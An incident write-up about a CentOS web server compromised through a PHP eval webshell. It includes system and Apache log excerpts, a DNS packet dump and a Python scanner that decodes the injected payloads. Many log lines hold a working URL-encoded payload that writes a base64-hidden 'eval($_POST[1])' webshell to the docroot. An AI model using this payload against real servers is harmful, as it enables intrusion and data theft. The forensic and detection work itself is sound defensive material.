
Linux

[CentOS] Intrusion check findings - eval



vi /var/log/messages

May 3 16:50:04 localhost httpd: PHP Warning: session_start(): open(/data/home2/mallcfg/public_html/data/session/sess_p0j0fn4els8ka8c3fd47sbpab2, O_RDWR) failed: Permission denied (13) in /data/home2/mallcfg/public_html/core/framework/core/base.php(5) : eval()'d code(1) : eval()'d code on line 2

eval()'d code(1): the log message shows PHP code being executed through the eval function.


Web log (140.117.150.103, Taiwan)
- The request times in the log below match the date of the actual data leak.

140.117.150.103 - - [08/May/2016:12:03:11 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 363
140.117.150.103 - - [08/May/2016:12:03:11 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [08/May/2016:12:03:13 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 363

140.117.150.103 - - [03/May/2016:06:33:39 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:06:33:39 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 28174
140.117.150.103 - - [03/May/2016:06:33:41 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 28174
140.117.150.103 - - [03/May/2016:06:33:48 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:06:33:48 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 302 -
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /administrator//webconfig.txt.php HTTP/1.1' 404 229
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /front/bbs/ini.php?device=mobile1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 1141
140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 302 -
140.117.150.103 - - [03/May/2016:06:33:50 +0900] 'GET /front/bbs/ini.php?device=mobile1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 1141
140.117.150.103 - - [03/May/2016:10:07:59 +0900] 'GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 404 212
140.117.150.103 - - [03/May/2016:10:07:59 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 29118
140.117.150.103 - - [03/May/2016:10:08:01 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 29118


Packet dump captured at the time of the actual leak

23:27:20.751468 IP xxx.xx.53.106.60337 > 120.52.32.53.53:  9196+ A? vnc8.com. (26)
23:27:20.751478 IP xxx.xx.53.106.60337 > 113.17.175.180.53:  19727+ A? vnc8.com. (26)
23:27:20.751500 IP xxx.xx.53.106.60337 > 14.18.140.32.53:  57252+ A? hx167.com. (27)
23:27:20.751520 IP xxx.xx.53.106.60337 > 113.17.175.180.53:  53764+ A? vnc8.com. (26)
23:27:20.751536 IP xxx.xx.53.106.60337 > 120.52.32.53.53:  6389+ A? vnc8.com. (26)

23:00:01.186493 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  49771+ A? salangane-books.com. (37)
23:00:01.186526 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  30438+ A? salangane-books.com. (37)
23:00:01.186551 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  54579+ A? salangane-books.com. (37)
23:00:01.186575 IP xxxx.xx.53.106.59419 > 173.245.59.226.53:  30763+ A? salangane-books.com. (37)
23:00:01.186601 IP xxx.xx.53.106.59419 > 173.245.59.226.53:  39498+ A? salangane-books.com. (37)



Testing confirms that requesting the URL as in the log below causes the base.php file shown below to be invoked.
The request disables error display, which confirms that a webshell file was used.

- URL request
xxx.xxx.87.2 - - [09/May/2016:12:47:20 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 248061

- System log check
May 9 12:47:20 localhost httpd: PHP Warning: session_start(): open(/data/home2/mallcfg/public_html/data/session/sess_i7f8nh486i1kndpjv4fgt2j4m4, O_RDWR) failed: Permission denied (13) in /data/home2/mallcfg/public_html/core/framework/core/base.php(5) : eval()'d code(1) : eval()'d code on line 2
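As an added example that is not part of the original write-up, the Python script below parses access-log lines in the format used by the web log above and the test request, percent-decodes the query string, flags PHP calls injected into parameter values, decodes the base64_decode() argument to show the content of the file that was written, and correlates later requests for that file. The sample log consists of two entries copied from the web log above plus one constructed benign line; the 10.0.0.5 address is made up.

```python
import base64
import re
from urllib.parse import unquote, urlsplit
# Access-log line as it appears on this page (request wrapped in single quotes; double also accepted).
LOG_RE = re.compile(
    r"^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] ['\"](?P<method>\S+) (?P<target>\S+) \S+['\"] "
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
# PHP calls that, appearing inside a query-string value, mean injected code rather than data.
SUSPICIOUS = ("file_put_contents(", "base64_decode(", "ini_set(", "eval(", "system(", "passthru(")
B64_ARG_RE = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")

def analyse_line(line):
    """Return a finding for one log line, or None when its query string carries no PHP calls."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(urlsplit(m.group("target")).query)  # percent-decode the whole query string
    calls = [c for c in SUSPICIOUS if c in decoded]
    if not calls:
        return None
    # base64_decode('...') hides the real payload; decode it so the dropped file's content is visible
    payloads = [base64.b64decode(b).decode("utf-8", "replace") for b in B64_ARG_RE.findall(decoded)]
    return {
        "ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
        "calls": calls,
        "dropped_files": re.findall(r"'(/[^']+)'", decoded),  # quoted absolute paths = files written
        "payloads": payloads,
        "payload_has_eval": any("eval(" in p for p in payloads),
    }

def scan(lines):
    """Scan a log; also flag later requests for any file an injected request wrote to the docroot."""
    findings, dropped = [], set()
    for line in lines:
        f = analyse_line(line)
        if f:
            findings.append(f)
            dropped.update(f["dropped_files"])
    followups = [(m.group("ip"), m.group("ts"), m.group("target"), int(m.group("status")))
                 for m in map(LOG_RE.match, lines)
                 if m and any(urlsplit(m.group("target")).path.endswith(d) for d in dropped)]
    return findings, sorted(dropped), followups

# Sample input: two entries copied from the web log on this page plus one constructed benign line.
SAMPLE_LOG = [
    "140.117.150.103 - - [03/May/2016:06:33:39 +0900] 'GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1' 200 28174",
    "140.117.150.103 - - [03/May/2016:06:33:49 +0900] 'GET /administrator//webconfig.txt.php HTTP/1.1' 404 229",
    "10.0.0.5 - - [03/May/2016:06:40:00 +0900] 'GET /index.php?page=2 HTTP/1.1' 200 512",  # constructed
]
print(scan(SAMPLE_LOG))
```

The `dropped` list tells you which paths under DOCUMENT_ROOT to inspect on the server, and a follow-up request returning 200 (rather than the 404 seen here) would indicate the dropped file was actually reachable.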